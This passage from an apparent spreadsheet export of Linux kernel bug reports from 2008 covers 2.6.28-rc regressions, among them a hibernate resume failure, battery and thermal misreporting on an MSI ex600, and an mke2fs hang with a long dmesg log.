    <t>Latest working kernel version: 2.6.27.3 Earliest failing kernel version: 2.6.28-rc1 Distribution: Gentoo Hardware Environment: # lspci 00:00.0 Host bridge: Intel Corporation 82855PM Processor to I/O Controller (rev 03) 00:01.0 PCI bridge: Intel Corporation 82855PM Processor to AGP Controller (rev 03) 00:1d.0 USB Controller: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) USB UHCI Controller #1 (rev 01) 00:1d.1 USB Controller: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) USB UHCI Controller #2 (rev 01) 00:1d.2 USB Controller: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) USB UHCI Controller #3 (rev 01) 00:1d.7 USB Controller: Intel Corporation 82801DB/DBM (ICH4/ICH4-M) USB2 EHCI Controller (rev 01) 00:1e.0 PCI bridge: Intel Corporation 82801 Mobile PCI Bridge (rev 81) 00:1f.0 ISA bridge: Intel Corporation 82801DBM (ICH4-M) LPC Interface Bridge (rev 01) 00:1f.1 IDE interface: Intel Corporation 82801DBM (ICH4-M) IDE Controller (rev 01) 00:1f.3 SMBus: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) SMBus Controller (rev 01) 00:1f.5 Multimedia audio controller: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) AC'97 Audio Controller (rev 01) 00:1f.6 Modem: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) AC'97 Modem Controller (rev 01) 01:00.0 VGA compatible controller: ATI Technologies Inc Radeon RV250 [Mobility FireGL 9000] (rev 01) 02:00.0 FireWire (IEEE 1394): VIA Technologies, Inc. VT6306 Fire II IEEE 1394 OHCI Link Layer Controller (rev 80) 02:01.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8139/8139C/8139C+ (rev 20) 02:02.0 Network controller: Intel Corporation PRO/Wireless LAN 2100 3B Mini PCI Adapter (rev 04) 02:04.0 CardBus bridge: ENE Technology Inc CB1410 Cardbus Controller Software Environment: Problem Description: resuming from harddisk ends in a blinking capslock-led, just about before finishing resuming. (X was active while suspending to disk) fails with 2.6.28-rc1 and 2.6.28-rc2 Steps to reproduce:</t>
  </si>
  <si>
    <t>Battery information and status disappearing and wrong thermal status - MSI ex600 laptop</t>
  </si>
  <si>
    <t>2008-10-29 15:33 UTC</t>
  </si>
  <si>
    <t>Mark</t>
  </si>
  <si>
    <t>2012-11-11 19:01 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.26 Earliest failing kernel version:2.6.27 Distribution: Ubuntu Hardware Environment: Intel Core 2 Duo cpu, MSI ex600 laptop. Software Environment: x86_64 Problem Description: The latest patch for the EC driver from ver. 2.0 to 2.1 is causing the battery on my laptop to disappear within a few minutes after the boot. cat /proc/acpi/battery/BAT1/state shows present: no In addition the cat /proc/acpi/thermal_zone/THRM/temperature command after booting shows the correct temperature of around 56C, but then again after a few minutes of work it always shows 146C. I don't know the exact patch number, however it is this one: http://lkml.org/lkml/2008/10/11/43 I have initially reported this bug on Ubuntu, you can see it here: https://bugs.launchpad.net/ubuntu/+source/linux/+bug/286169 But since then I've tried the mainline 2.6.28-rc2 kernel, with and without this patch, and the bug is there. Without this patch the dmesg shows this: [ 0.587824] PCI: MCFG configuration 0: base e0000000 segment 0 buses 0 - 255 [ 0.588162] ACPI Error (evregion-0315): No handler for Region [EC__] (ffff88007fb305e8) [EmbeddedControl] [20080609] [ 0.588168] ACPI Error (exfldio-0291): Region EmbeddedControl(3) has no handler [20080609] [ 0.588173] ACPI Error (psparse-0530): Method parse/execution failed [\_SB_.PCI0.SBRG.EC__.BAT1._STA] (Node ffff88007fb33040), AE_NOT_EXIST [ 0.588212] ACPI Error (uteval-0232): Method execution failed [\_SB_.PCI0.SBRG.EC__.BAT1._STA] (Node ffff88007fb33040), AE_NOT_EXIST [ 0.589684] ACPI Error (evregion-0315): No handler for Region [EC__] (ffff88007fb305e8) [EmbeddedControl] [20080609] [ 0.589689] ACPI Error (exfldio-0291): Region EmbeddedControl(3) has no handler [20080609] [ 0.589694] ACPI Error (psparse-0530): Method parse/execution failed [\_SB_.PCI0.SBRG.EC__.BAT1._STA] (Node ffff88007fb33040), AE_NOT_EXIST [ 0.589732] ACPI Error (uteval-0232): Method execution failed [\_SB_.PCI0.SBRG.EC__.BAT1._STA] (Node ffff88007fb33040), AE_NOT_EXIST [ 0.589824] PCI: MCFG area at e0000000 reserved in ACPI motherboard resources [ 0.598949] PCI: Using MMCONFIG at e0000000 - efffffff [ 0.600599] ACPI: EC: non-query interrupt received, switching to interrupt mode [ 0.600599] ACPI: EC: GPE storm detected, disabling EC GPE [ 0.669385] ACPI: EC: GPE = 0x17, I/O: command/status = 0x66, data = 0x62 [ 0.669385] ACPI: EC: driver started in poll mode and the ACPI is working fine in poll mode. However with this patch the dmesg shows this: [ 0.159226] PCI: MCFG configuration 0: base e0000000 segment 0 buses 0 - 255 [ 0.156016] ACPI: EC: non-query interrupt received, switching to interrupt mode [ 0.172212] PCI: MCFG area at e0000000 reserved in ACPI motherboard resources [ 0.185424] PCI: Using MMCONFIG at e0000000 - efffffff [ 0.193727] ACPI: EC: GPE = 0x17, I/O: command/status = 0x66, data = 0x62 [ 0.193727] ACPI: EC: driver started in interrupt mode The ACPI in this case on my hardware stops working properly in interrupt mode after a few minutes and never returns to normal. I would gladly help in any way I can and provide additional information if needed.</t>
  </si>
  <si>
    <t>2.6.28-rc2 / hso driver oops</t>
  </si>
  <si>
    <t>2008-10-29 16:26 UTC</t>
  </si>
  <si>
    <t>2008-11-09 09:48 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.28-rc2 / hso driver oops Submitter : Jonathan McDowell &lt;noodles@earth.li&gt; Date : 2008-10-29 16:40 References : http://marc.info/?l=linux-kernel&amp;m=122529846811013&amp;w=4 Handled-By : Ben Hutchings &lt;bhutchings@solarflare.com&gt; This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.28-rc2 regression: keyboard dead after ACPI reboot on Toshiba Portege 4000</t>
  </si>
  <si>
    <t>2008-10-29 16:30 UTC</t>
  </si>
  <si>
    <t>2008-11-12 18:21 UTC</t>
  </si>
  <si>
    <t>Subject : regression: keyboard dead after reboot on Toshiba Portege 4000 Submitter : Andrey Borzenkov &lt;arvidjaar@mail.ru&gt; Date : 2008-10-28 19:05 References : http://marc.info/?l=linux-acpi&amp;m=122522085418555&amp;w=4 This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>[2.6.28-rc2] EeePC ACPI errors &amp; exceptions</t>
  </si>
  <si>
    <t>2008-10-29 16:34 UTC</t>
  </si>
  <si>
    <t>2008-11-16 13:47 UTC</t>
  </si>
  <si>
    <t>Subject : [2.6.28-rc2] EeePC ACPI errors &amp; exceptions Submitter : Darren Salt &lt;linux@youmustbejoking.demon.co.uk&gt; Date : 2008-10-27 22:52 References : http://marc.info/?l=linux-kernel&amp;m=122514911328761&amp;w=4 Handled-By : Alexey Starikovskiy &lt;aystarik@gmail.com&gt; Handled-By : Zhao Yakui &lt;yakui.zhao@intel.com&gt; This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>mke2fs hang on AIC79 device.</t>
  </si>
  <si>
    <t>2.6.28-rc1/rc2</t>
  </si>
  <si>
    <t>2008-10-30 01:17 UTC</t>
  </si>
  <si>
    <t>Alex Shi</t>
  </si>
  <si>
    <t>2008-12-13 10:23 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version:2.6.27 Earliest failing kernel version:2.6.28-rc1 Distribution:RHEL 4.91 Hardware Environment:AIC79xx Software Environment: Problem Description: Steps to reproduce: mke2fs /dev/sdx [root@linux-b03 ~]# mke2fs /dev/sdb1 mke2fs 1.39 (29-May-2006) Filesystem label= OS type: Linux Block size=4096 (log=2) Fragment size=4096 (log=2) 3842720 inodes, 7679996 blocks 383999 blocks (5.00%) reserved for the super user First data block=0 Maximum filesystem blocks=4294967296 235 block groups 32768 blocks per group, 32768 fragments per group 16352 inodes per group Superblock backups stored on blocks: 32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632, 2654208, 4096000 Writing inode tables: done Writing superblocks and filesystem accounting information: ..... hang .... lspci : 04:02.0 SCSI storage controller: Adaptec AIC-7902B U320 (rev 10) Subsystem: Super Micro Computer Inc Unknown device 8080 Flags: bus master, 66MHz, slow devsel, latency 64, IRQ 16 I/O ports at 2400 [disabled] [size=256] Memory at c8200000 (64-bit, non-prefetchable) [size=8K] I/O ports at 2000 [disabled] [size=256] [virtual] Expansion ROM at c2000000 [disabled] [size=512K] Capabilities: &lt;access denied&gt; 04:02.1 SCSI storage controller: Adaptec AIC-7902B U320 (rev 10) Subsystem: Super Micro Computer Inc Unknown device 8080 Flags: bus master, 66MHz, slow devsel, latency 64, IRQ 17 I/O ports at 2c00 [disabled] [size=256] Memory at c8202000 (64-bit, non-prefetchable) [size=8K] I/O ports at 2800 [disabled] [size=256] [virtual] Expansion ROM at c2080000 [disabled] [size=512K] Capabilities: &lt;access denied&gt; dmesg: 8D0, 0014 (r0 PTLTD ) ACPI: RSDT BFF631DD, 003C (r1 PTLTD RSDT 6040000 LTP 0) ACPI: FACP BFF68E10, 0074 (r1 INTEL TUMWATER 6040000 PTL 3) ACPI: DSDT BFF64ACF, 4341 (r1 Intel BLAKFORD 6040000 MSFT 100000E) ACPI: FACS BFF69FC0, 0040 ACPI: APIC BFF68E84, 00C8 (r1 PTLTD APIC 6040000 LTP 0) ACPI: MCFG BFF68F4C, 003C (r1 PTLTD MCFG 6040000 LTP 0) ACPI: BOOT BFF68F88, 0028 (r1 PTLTD $SBFTBL$ 6040000 LTP 1) ACPI: SPCR BFF68FB0, 0050 (r1 PTLTD $UCRTBL$ 6040000 PTL 1) ACPI: SSDT BFF63219, 13EC (r1 PmRef CpuPm 3000 INTL 20050228) ACPI: Local APIC address 0xfee00000 (7 early reservations) ==&gt; bootmem [0000000000 - 0140000000] #0 [0000000000 - 0000001000] BIOS data page ==&gt; [0000000000 - 0000001000] #1 [0000006000 - 0000008000] TRAMPOLINE ==&gt; [0000006000 - 0000008000] #2 [0000200000 - 00006cabc8] TEXT DATA BSS ==&gt; [0000200000 - 00006cabc8] #3 [0037eba000 - 0037fefe92] RAMDISK ==&gt; [0037eba000 - 0037fefe92] #4 [000009c800 - 0000100000] BIOS reserved ==&gt; [000009c800 - 0000100000] #5 [0000008000 - 000000b000] PGTABLE ==&gt; [0000008000 - 000000b000] #6 [000000b000 - 000000c000] PGTABLE ==&gt; [000000b000 - 000000c000] found SMP MP-table at [ffff8800000f5900] 000f5900 [ffffe20000000000-ffffe200045fffff] PMD -&gt; [ffff880028200000-ffff88002c7fffff] on node 0 Zone PFN ranges: DMA 0x00000000 -&gt; 0x00001000 DMA32 0x00001000 -&gt; 0x00100000 Normal 0x00100000 -&gt; 0x00140000 Movable zone start PFN for each node early_node_map[3] active PFN ranges 0: 0x00000000 -&gt; 0x0000009c 0: 0x00000100 -&gt; 0x000bff60 0: 0x00100000 -&gt; 0x00140000 On node 0 totalpages: 1048316 DMA zone: 56 pages used for memmap DMA zone: 1334 pages reserved DMA zone: 2606 pages, LIFO batch:0 DMA32 zone: 14280 pages used for memmap DMA32 zone: 767896 pages, LIFO batch:31 Normal zone: 3584 pages used for memmap Normal zone: 258560 pages, LIFO batch:31 Movable zone: 0 pages used for memmap ACPI: PM-Timer IO Port: 0x1008 ACPI: Local APIC address 0xfee00000 ACPI: LAPIC (acpi_id[0x00] lapic_id[0x00] enabled) ACPI: LAPIC (acpi_id[0x01] lapic_id[0x04] enabled) ACPI: LAPIC (acpi_id[0x02] lapic_id[0x01] enabled) ACPI: LAPIC (acpi_id[0x03] lapic_id[0x05] enabled) ACPI: LAPIC (acpi_id[0x04] lapic_id[0x02] enabled) ACPI: LAPIC (acpi_id[0x05] lapic_id[0x06] enabled) ACPI: LAPIC (acpi_id[0x06] lapic_id[0x03] enabled) ACPI: LAPIC (acpi_id[0x07] lapic_id[0x07] enabled) ACPI: LAPIC_NMI (acpi_id[0x00] high edge lint[0x1]) ACPI: LAPIC_NMI (acpi_id[0x01] high edge lint[0x1]) ACPI: LAPIC_NMI (acpi_id[0x02] high edge lint[0x1]) ACPI: LAPIC_NMI (acpi_id[0x03] high edge lint[0x1]) ACPI: LAPIC_NMI (acpi_id[0x04] high edge lint[0x1]) ACPI: LAPIC_NMI (acpi_id[0x05] high edge lint[0x1]) ACPI: LAPIC_NMI (acpi_id[0x06] high edge lint[0x1]) ACPI: LAPIC_NMI (acpi_id[0x07] high edge lint[0x1]) ACPI: IOAPIC (id[0x08] address[0xfec00000] gsi_base[0]) IOAPIC[0]: apic_id 8, version 0, address 0xfec00000, GSI 0-23 ACPI: IOAPIC (id[0x09] address[0xfec80000] gsi_base[24]) IOAPIC[1]: apic_id 9, version 0, address 0xfec80000, GSI 24-47 ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 high edge) ACPI: INT_SRC_OVR (bus 0 bus_irq 9 global_irq 9 high level) ACPI: IRQ0 used by override. ACPI: IRQ2 used by override. ACPI: IRQ9 used by override. Using ACPI (MADT) for SMP configuration information SMP: Allowing 8 CPUs, 0 hotplug CPUs Allocating PCI resources starting at c2000000 (gap: c0000000:20000000) PERCPU: Allocating 45056 bytes of per cpu data NR_CPUS: 8, nr_cpu_ids: 8, nr_node_ids 1 Built 1 zonelists in Zone order, mobility grouping on. Total pages: 1029062 Kernel command line: ro root=LABEL=/1 profile=2 console=ttyS0,38400 kernel profiling enabled (shift: 2) Initializing CPU#0 PID hash table entries: 4096 (order: 12, 32768 bytes) Fast TSC calibration using PIT Detected 2400.210 MHz processor. Console: colour VGA+ 80x25 console [ttyS0] enabled Dentry cache hash table entries: 524288 (order: 10, 4194304 bytes) Inode-cache hash table entries: 262144 (order: 9, 2097152 bytes) Checking aperture... No AGP bridge found Calgary: detecting Calgary via BIOS EBDA area Calgary: Unable to locate Rio Grande table in EBDA - bailing! PCI-DMA: Using software bounce buffering for IO (SWIOTLB) Placing software IO TLB between 0x20000000 - 0x24000000 Memory: 4039052k/5242880k available (2745k kernel code, 153224k reserved, 1353k data, 328k init) Calibrating delay loop (skipped), value calculated using timer frequency.. 4800.42 BogoMIPS (lpj=9600840) Mount-cache hash table entries: 256 CPU: L1 I cache: 32K, L1 D cache: 32K CPU: L2 cache: 4096K CPU: Physical Processor ID: 0 CPU: Processor Core ID: 0 CPU0: Thermal monitoring handled by SMI using mwait in idle threads. ACPI: Core revision 20080926 Parsing all Control Methods: Table [DSDT](id 0001) - 421 Objects with 47 Devices 131 Methods 22 Regions Parsing all Control Methods: Table [SSDT](id 0002) - 43 Objects with 0 Devices 16 Methods 0 Regions tbxface-0596 [00] tb_load_namespace : ACPI Tables successfully acquired evxfevnt-0091 [00] enable : Transition to ACPI mode successful Setting APIC routing to flat ..TIMER: vector=0x30 apic1=0 pin1=2 apic2=-1 pin2=-1 CPU0: Intel(R) Xeon(R) CPU X5340 @ 2.40GHz stepping 07 Booting processor 1 APIC 0x4 ip 0x6000 Initializing CPU#1 Calibrating delay using timer specific routine.. 4800.39 BogoMIPS (lpj=9600793) CPU: L1 I cache: 32K, L1 D cache: 32K CPU: L2 cache: 4096K CPU: Physical Processor ID: 1 CPU: Processor Core ID: 0 CPU1: Thermal monitoring enabled (TM2) CPU1: Intel(R) Xeon(R) CPU X5340 @ 2.40GHz stepping 07 checking TSC synchronization [CPU#0 -&gt; CPU#1]: passed. Booting processor 2 APIC 0x1 ip 0x6000 Initializing CPU#2 Calibrating delay using timer specific routine.. 4800.39 BogoMIPS (lpj=9600792) CPU: L1 I cache: 32K, L1 D cache: 32K CPU: L2 cache: 4096K CPU: Physical Processor ID: 0 CPU: Processor Core ID: 1 CPU2: Thermal monitoring enabled (TM2) CPU2: Intel(R) Xeon(R) CPU X5340 @ 2.40GHz stepping 07 checking TSC synchronization [CPU#0 -&gt; CPU#2]: passed. Booting processor 3 APIC 0x5 ip 0x6000 Initializing CPU#3 Calibrating delay using timer specific routine.. 4800.39 BogoMIPS (lpj=9600792) CPU: L1 I cache: 32K, L1 D cache: 32K CPU: L2 cache: 4096K CPU: Physical Processor ID: 1 CPU: Processor Core ID: 1 CPU3: Thermal monitoring enabled (TM2) CPU3: Intel(R) Xeon(R) CPU X5340 @ 2.40GHz stepping 07 checking TSC synchronization [CPU#0 -&gt; CPU#3]: passed. Booting processor 4 APIC 0x2 ip 0x6000 Initializing CPU#4 Calibrating delay using timer specific routine.. 4800.36 BogoMIPS (lpj=9600737) CPU: L1 I cache: 32K, L1 D cache: 32K CPU: L2 cache: 4096K CPU: Physical Processor ID: 0 CPU: Processor Core ID: 2 CPU4: Thermal monitoring enabled (TM2) CPU4: Intel(R) Xeon(R) CPU X5340 @ 2.40GHz stepping 07 checking TSC synchronization [CPU#0 -&gt; CPU#4]: passed. Booting processor 5 APIC 0x6 ip 0x6000 Initializing CPU#5 Calibrating delay using timer specific routine.. 4800.39 BogoMIPS (lpj=9600791) CPU: L1 I cache: 32K, L1 D cache: 32K CPU: L2 cache: 4096K CPU: Physical Processor ID: 1 CPU: Processor Core ID: 2 CPU5: Thermal monitoring enabled (TM2) CPU5: Intel(R) Xeon(R) CPU X5340 @ 2.40GHz stepping 07 checking TSC synchronization [CPU#0 -&gt; CPU#5]: passed. Booting processor 6 APIC 0x3 ip 0x6000 Initializing CPU#6 Calibrating delay using timer specific routine.. 4800.36 BogoMIPS (lpj=9600728) CPU: L1 I cache: 32K, L1 D cache: 32K CPU: L2 cache: 4096K CPU: Physical Processor ID: 0 CPU: Processor Core ID: 3 CPU6: Thermal monitoring enabled (TM2) CPU6: Intel(R) Xeon(R) CPU X5340 @ 2.40GHz stepping 07 checking TSC synchronization [CPU#0 -&gt; CPU#6]: passed. Booting processor 7 APIC 0x7 ip 0x6000 Initializing CPU#7 Calibrating delay using timer specific routine.. 4801.13 BogoMIPS (lpj=9602264) CPU: L1 I cache: 32K, L1 D cache: 32K CPU: L2 cache: 4096K CPU: Physical Processor ID: 1 CPU: Processor Core ID: 3 CPU7: Thermal monitoring enabled (TM2) CPU7: Intel(R) Xeon(R) CPU X5340 @ 2.40GHz stepping 07 checking TSC synchronization [CPU#0 -&gt; CPU#7]: passed. Brought up 8 CPUs Total of 8 processors activated (38403.86 BogoMIPS). net_namespace: 888 bytes NET: Registered protocol family 16 ACPI: bus type pci registered PCI: MCFG configuration 0: base e0000000 segment 0 buses 0 - 10 PCI: MCFG area at e0000000 reserved in E820 PCI: Using MMCONFIG at e0000000 - e0afffff PCI: Using configuration type 1 for base access evgpeblk-0957 [00] ev_create_gpe_block : GPE 00 to 1F [_GPE] 4 regs on int 0x9 ACPI: EC: Look up EC in DSDT Completing Region/Field/Buffer/Package initialization:......................................................................... Initialized 17/22 Regions 0/0 Fields 35/35 Buffers 21/21 Packages (473 nodes) Initializing Device/Processor/Thermal objects by executing _INI methods:. Executed 1 _INI methods requiring 0 _STA executions (examined 57 objects) evgpeblk-1054 [00] ev_initialize_gpe_bloc: Found 9 Wake, Enabled 0 Runtime GPEs in this block ACPI: Interpreter enabled ACPI: (supports S0 S1 S5) ACPI: Using IOAPIC for interrupt routing ACPI: PCI Root Bridge [PCI0] (0000:00) pci 0000:00:00.0: PME# supported from D0 D3hot D3cold pci 0000:00:00.0: PME# disabled pci 0000:00:02.0: PME# supported from D0 D3hot D3cold pci 0000:00:02.0: PME# disabled pci 0000:00:04.0: PME# supported from D0 D3hot D3cold pci 0000:00:04.0: PME# disabled pci 0000:00:06.0: PME# supported from D0 D3hot D3cold pci 0000:00:06.0: PME# disabled pci 0000:00:08.0: reg 10 64bit mmio: [0xfe700000-0xfe7003ff] pci 0000:00:08.0: PME# supported from D0 D3hot D3cold pci 0000:00:08.0: PME# disabled pci 0000:00:1c.0: PME# supported from D0 D3hot D3cold pci 0000:00:1c.0: PME# disabled pci 0000:00:1d.0: reg 20 io port: [0x1800-0x181f] pci 0000:00:1d.1: reg 20 io port: [0x1820-0x183f] pci 0000:00:1d.2: reg 20 io port: [0x1840-0x185f] pci 0000:00:1d.7: reg 10 32bit mmio: [0xc8000000-0xc80003ff] pci 0000:00:1d.7: PME# supported from D0 D3hot D3cold pci 0000:00:1d.7: PME# disabled pci 0000:00:1f.0: Force enabled HPET at 0xfed00000 pci 0000:00:1f.1: reg 10 io port: [0x00-0x07] pci 0000:00:1f.1: reg 14 io port: [0x00-0x03] pci 0000:00:1f.1: reg 18 io port: [0x00-0x07] pci 0000:00:1f.1: reg 1c io port: [0x00-0x03] pci 0000:00:1f.1: reg 20 io port: [0x1860-0x186f] pci 0000:00:1f.3: reg 20 io port: [0x1100-0x111f] pci 0000:01:00.0: PME# supported from D0 D3hot D3cold pci 0000:01:00.0: PME# disabled pci 0000:01:00.3: PME# supported from D0 D3hot D3cold pci 0000:01:00.3: PME# disabled pci 0000:00:02.0: bridge io port: [0x2000-0x3fff] pci 0000:00:02.0: bridge 32bit mmio: [0xc8100000-0xc83fffff] pci 0000:02:00.0: PME# supported from D0 D3hot D3cold pci 0000:02:00.0: PME# disabled pci 0000:02:02.0: PME# supported from D0 D3hot D3cold pci 0000:02:02.0: PME# disabled pci 0000:01:00.0: bridge io port: [0x2000-0x3fff] pci 0000:01:00.0: bridge 32bit mmio: [0xc8200000-0xc83fffff] pci 0000:03:00.0: PXH quirk detected; SHPC device MSI disabled pci 0000:03:00.0: PME# supported from D0 D3hot D3cold pci 0000:03:00.0: PME# disabled pci 0000:03:00.2: PXH quirk detected; SHPC device MSI disabled pci 0000:03:00.2: PME# supported from D0 D3hot D3cold pci 0000:03:00.2: PME# disabled pci 0000:02:00.0: bridge io port: [0x2000-0x2fff] pci 0000:02:00.0: bridge 32bit mmio: [0xc8200000-0xc82fffff] pci 0000:04:02.0: reg 10 io port: [0x2400-0x24ff] pci 0000:04:02.0: reg 14 64bit mmio: [0xc8200000-0xc8201fff] pci 0000:04:02.0: reg 1c io port: [0x2000-0x20ff] pci 0000:04:02.0: reg 30 32bit mmio: [0x000000-0x07ffff] pci 0000:04:02.1: reg 10 io port: [0x2c00-0x2cff] pci 0000:04:02.1: reg 14 64bit mmio: [0xc8202000-0xc8203fff] pci 0000:04:02.1: reg 1c io port: [0x2800-0x28ff] pci 0000:04:02.1: reg 30 32bit mmio: [0x000000-0x07ffff] pci 0000:03:00.0: bridge io port: [0x2000-0x2fff] pci 0000:03:00.0: bridge 32bit mmio: [0xc8200000-0xc82fffff] pci 0000:06:00.0: reg 10 32bit mmio: [0xc8320000-0xc833ffff] pci 0000:06:00.0: reg 14 32bit mmio: [0xc8300000-0xc831ffff] pci 0000:06:00.0: reg 18 io port: [0x3000-0x301f] pci 0000:06:00.0: reg 30 32bit mmio: [0x000000-0x00ffff] pci 0000:06:00.0: PME# supported from D0 D3hot D3cold pci 0000:06:00.0: PME# disabled pci 0000:06:00.1: reg 10 32bit mmio: [0xc8360000-0xc837ffff] pci 0000:06:00.1: reg 14 32bit mmio: [0xc8340000-0xc835ffff] pci 0000:06:00.1: reg 18 io port: [0x3020-0x303f] pci 0000:06:00.1: reg 30 32bit mmio: [0x000000-0x00ffff] pci 0000:06:00.1: PME# supported from D0 D3hot D3cold pci 0000:06:00.1: PME# disabled pci 0000:02:02.0: bridge io port: [0x3000-0x3fff] pci 0000:02:02.0: bridge 32bit mmio: [0xc8300000-0xc83fffff] pci 0000:0b:01.0: reg 10 32bit mmio: [0xd0000000-0xd7ffffff] pci 0000:0b:01.0: reg 14 io port: [0x4000-0x40ff] pci 0000:0b:01.0: reg 18 32bit mmio: [0xc8400000-0xc840ffff] pci 0000:0b:01.0: reg 30 32bit mmio: [0x000000-0x01ffff] pci 0000:0b:01.0: supports D1 D2 pci 0000:00:1e.0: transparent bridge pci 0000:00:1e.0: bridge io port: [0x4000-0x4fff] pci 0000:00:1e.0: bridge 32bit mmio: [0xc8400000-0xc84fffff] pci 0000:00:1e.0: bridge 64bit mmio pref: [0xd0000000-0xd7ffffff] bus 00 -&gt; node 0 ACPI: PCI Interrupt Routing Table [\_SB_.PCI0._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.P0P2._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.P0P2.BMD0._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.P0P2.BMD0.BPD0.PXH0._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.P0P2.BMD0.BPD0.PXH1._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.P0P2.BMD0.BPD2._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.P0P2.BMF3._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.P0P4._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.P0P6._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.PEX0._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.PCIB._PRT] ACPI: PCI Interrupt Link [LNKA] (IRQs 3 4 5 6 7 10 11 14 15) *9 ACPI: PCI Interrupt Link [LNKB] (IRQs 3 4 *5 6 7 10 11 14 15) ACPI: PCI Interrupt Link [LNKC] (IRQs 3 4 5 6 7 10 *11 14 15) ACPI: PCI Interrupt Link [LNKD] (IRQs 3 4 5 6 7 *10 11 14 15) ACPI: PCI Interrupt Link [LNKE] (IRQs 3 4 5 6 7 10 11 14 15) *0, disabled. ACPI: PCI Interrupt Link [LNKF] (IRQs 4 5 6 7 10 11 14 15) *0, disabled. ACPI: PCI Interrupt Link [LNKG] (IRQs 3 4 5 6 7 10 11 14 15) *0, disabled. ACPI: PCI Interrupt Link [LNKH] (IRQs 4 5 6 7 10 11 14 15) *0, disabled. SCSI subsystem initialized PCI: Using ACPI for IRQ routing PCI-GART: No AMD northbridge found. hpet clockevent registered HPET: 3 timers in total, 0 timers will be used for per-cpu timer hpet0: at MMIO 0xfed00000, IRQs 2, 8, 0 hpet0: 3 comparators, 64-bit 14.318180 MHz counter pnp: PnP ACPI init ACPI: bus type pnp registered pnp: PnP ACPI: found 13 devices ACPI: ACPI bus type pnp unregistered system 00:01: ioport range 0x4d0-0x4d1 has been reserved system 00:01: ioport range 0x295-0x296 has been reserved system 00:01: ioport range 0xca2-0xca3 has been reserved system 00:01: ioport range 0xca8-0xcaf has been reserved system 00:01: ioport range 0x1000-0x107f has been reserved system 00:01: ioport range 0x1180-0x11bf has been reserved system 00:01: ioport range 0x800-0x80f has been reserved system 00:01: ioport range 0xfe00-0xfe00 has been reserved system 00:01: iomem range 0xe0000000-0xefffffff could not be reserved system 00:01: iomem range 0xfee00000-0xfee0ffff could not be reserved system 00:01: iomem range 0xfec80000-0xfec80fff has been reserved system 00:01: iomem range 0xfed1c000-0xfed1ffff has been reserved system 00:01: iomem range 0xfe000000-0xfe01ffff has been reserved system 00:01: iomem range 0xfe600000-0xfe6fffff has been reserved pci 0000:03:00.0: PCI bridge, secondary bus 0000:04 pci 0000:03:00.0: IO window: 0x2000-0x2fff pci 0000:03:00.0: MEM window: 0xc8200000-0xc82fffff pci 0000:03:00.0: PREFETCH window: 0x000000c2000000-0x000000c20fffff pci 0000:03:00.2: PCI bridge, secondary bus 0000:05 pci 0000:03:00.2: IO window: disabled pci 0000:03:00.2: MEM window: disabled pci 0000:03:00.2: PREFETCH window: disabled pci 0000:02:00.0: PCI bridge, secondary bus 0000:03 pci 0000:02:00.0: IO window: 0x2000-0x2fff pci 0000:02:00.0: MEM window: 0xc8200000-0xc82fffff pci 0000:02:00.0: PREFETCH window: 0x000000c2000000-0x000000c20fffff pci 0000:02:02.0: PCI bridge, secondary bus 0000:06 pci 0000:02:02.0: IO window: 0x3000-0x3fff pci 0000:02:02.0: MEM window: 0xc8300000-0xc83fffff pci 0000:02:02.0: PREFETCH window: 0x000000c2100000-0x000000c21fffff pci 0000:01:00.0: PCI bridge, secondary bus 0000:02 pci 0000:01:00.0: IO window: 0x2000-0x3fff pci 0000:01:00.0: MEM window: 0xc8200000-0xc83fffff pci 0000:01:00.0: PREFETCH window: 0x000000c2000000-0x000000c21fffff pci 0000:01:00.3: PCI bridge, secondary bus 0000:07 pci 0000:01:00.3: IO window: disabled pci 0000:01:00.3: MEM window: disabled pci 0000:01:00.3: PREFETCH window: disabled pci 0000:00:02.0: PCI bridge, secondary bus 0000:01 pci 0000:00:02.0: IO window: 0x2000-0x3fff pci 0000:00:02.0: MEM window: 0xc8100000-0xc83fffff pci 0000:00:02.0: PREFETCH window: 0x000000c2000000-0x000000c21fffff pci 0000:00:04.0: PCI bridge, secondary bus 0000:08 pci 0000:00:04.0: IO window: disabled pci 0000:00:04.0: MEM window: disabled pci 0000:00:04.0: PREFETCH window: disabled pci 0000:00:06.0: PCI bridge, secondary bus 0000:09 pci 0000:00:06.0: IO window: disabled pci 0000:00:06.0: MEM window: disabled pci 0000:00:06.0: PREFETCH window: disabled pci 0000:00:1c.0: PCI bridge, secondary bus 0000:0a pci 0000:00:1c.0: IO window: disabled pci 0000:00:1c.0: MEM window: disabled pci 0000:00:1c.0: PREFETCH window: disabled pci 0000:00:1e.0: PCI bridge, secondary bus 0000:0b pci 0000:00:1e.0: IO window: 0x4000-0x4fff pci 0000:00:1e.0: MEM window: 0xc8400000-0xc84fffff pci 0000:00:1e.0: PREFETCH window: 0x000000d0000000-0x000000d7ffffff pci 0000:00:02.0: PCI INT A -&gt; GSI 16 (level, low) -&gt; IRQ 16 pci 0000:00:02.0: setting latency timer to 